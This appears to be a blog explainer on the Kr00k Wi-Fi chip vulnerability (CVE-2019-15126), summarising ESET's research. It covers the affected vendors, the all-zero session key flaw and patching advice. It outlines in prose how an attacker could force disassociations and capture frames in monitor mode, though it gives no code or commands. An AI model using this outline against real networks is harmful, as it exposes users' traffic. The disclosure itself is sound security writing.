Summary:
ESET researchers discovered a ‘previously unknown vulnerability’ in Wi-Fi chips and named it Kr00k. More than a billion devices are affected by this vulnerability including phones, tablets, computers, Wi-Fi routers and IOT devices with Wi-Fi capabilities. This article aims to shed some light on this newly discovered attack vector. The vulnerability itself, the attack vector and how they do it. As mentioned later in the article, protect yourself now by ensuring Wi-Fi capable devices have updated their respective firmware.
Start:
The Kr00k vulnerability is a serious flaw and has been assigned the name CVE-2019-15126 by ESET researchers. Until now this vulnerability has been unknown, yet it affects billions of devices. A successful attack allows an adversary to decrypt wireless network packets transmitted by vulnerable devices. Vulnerable devices would be those containing the affected Wi-Fi chips. As previously mentioned, the Wi-Fi chips would be part of phones, tablets, computers, Wi-Fi routers and IOT devices with Wi-Fi capabilities. This is a huge threat to the IOT world as it presents a new and previously unknown attack vector.
Kr00k is the vulnerability and it affects devices with Wi-Fi chips by Broadcom and Cypress that haven’t yet been patched. But because attackers can get a hold of wireless network packets, network devices are still at risk if unpatched devices exist on the network. Essentially as soon as there is one weak link in your ecosystem in terms of Wi-Fi chips, then there is a possible attack vector.
To quote the executive summary from ESET more specifically ‘tests confirmed that prior to patching, some client devices by Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), as well as some access points by Asus and Huawei, were vulnerable to Kr00k.’
ESET goes on to say that a conservative estimate of over a billion Wi-Fi-capable devices and access points were vulnerable to Kr00k. The ESET researches noted that vendors whose products they did not test also use the affected chipsets in their devices.
The Vulnerability:
From PDF, Kr00k manifests itself after a disassociation. Once a station’s WLAN session gets disassociated (1), the session key (TK) stored in the Wireless Network Interface Controller’s (WNIC) Wi-Fi chip is cleared in memory – set to zero (2). This is expected behavior, as no further data is supposed to be transmitted after the disassociation. However, we discovered that all data frames that were left in the chip’s Tx (transmit) buffer were transmitted (4) after being encrypted with this all-zero key (3).
The Attack Vector:
Since Kr00k (encryption with an all-zero TK) manifests itself following a disassociation, an adversary can exploit this by manually triggering disassociations – as opposed to the disassociations that occur naturally. This is possible, because a disassociation can be triggered by a management data frame that’s unauthenticated and unencrypted. There are possibly even other methods or events that can cause a disassociation (e.g. transmitting malcrafted packets, EAPOLs, etc.) – and/or to trigger Kr00k.
How they do it:
As explained in the previous section, after a disassociation occurs, data from the chip’s Tx buffer will be transmitted encrypted with the all-zero TK. These data frames can be captured by an adversary and subsequently decrypted. This data can contain several kilobytes of potentially sensitive information. This is possible even if the attacker is not connected (authenticated and associated) to the WLAN (e.g. doesn’t know the PSK) – by using a WNIC in monitor mode – which is what would make Kr00k advantageous for the attackers, compared to some other attack techniques used against Wi-Fi security. By repeatedly triggering disassociations (effectively causing reassociations, as the session will usually reconnect), the attacker can capture more data frames.
ESET reported the vulnerability to chip manufacturers Broadcom and Cypress, who have since released patches. Patches for devices by major manufacturers have also been released by now. To protect yourself, as a user, make sure you have updated your devices firmware, all the devices that are Wi-Fi capable.
If you are interested in reading further, Kr00k (the vulnerability) is related to – but not the same as KRACK.
References:
The facts and information throughout this article was taken from the ESETs published literature on the topic of Kr00k which can be found HERE. This article has also taken facts and information John Leyden’s article, which can be found HERE.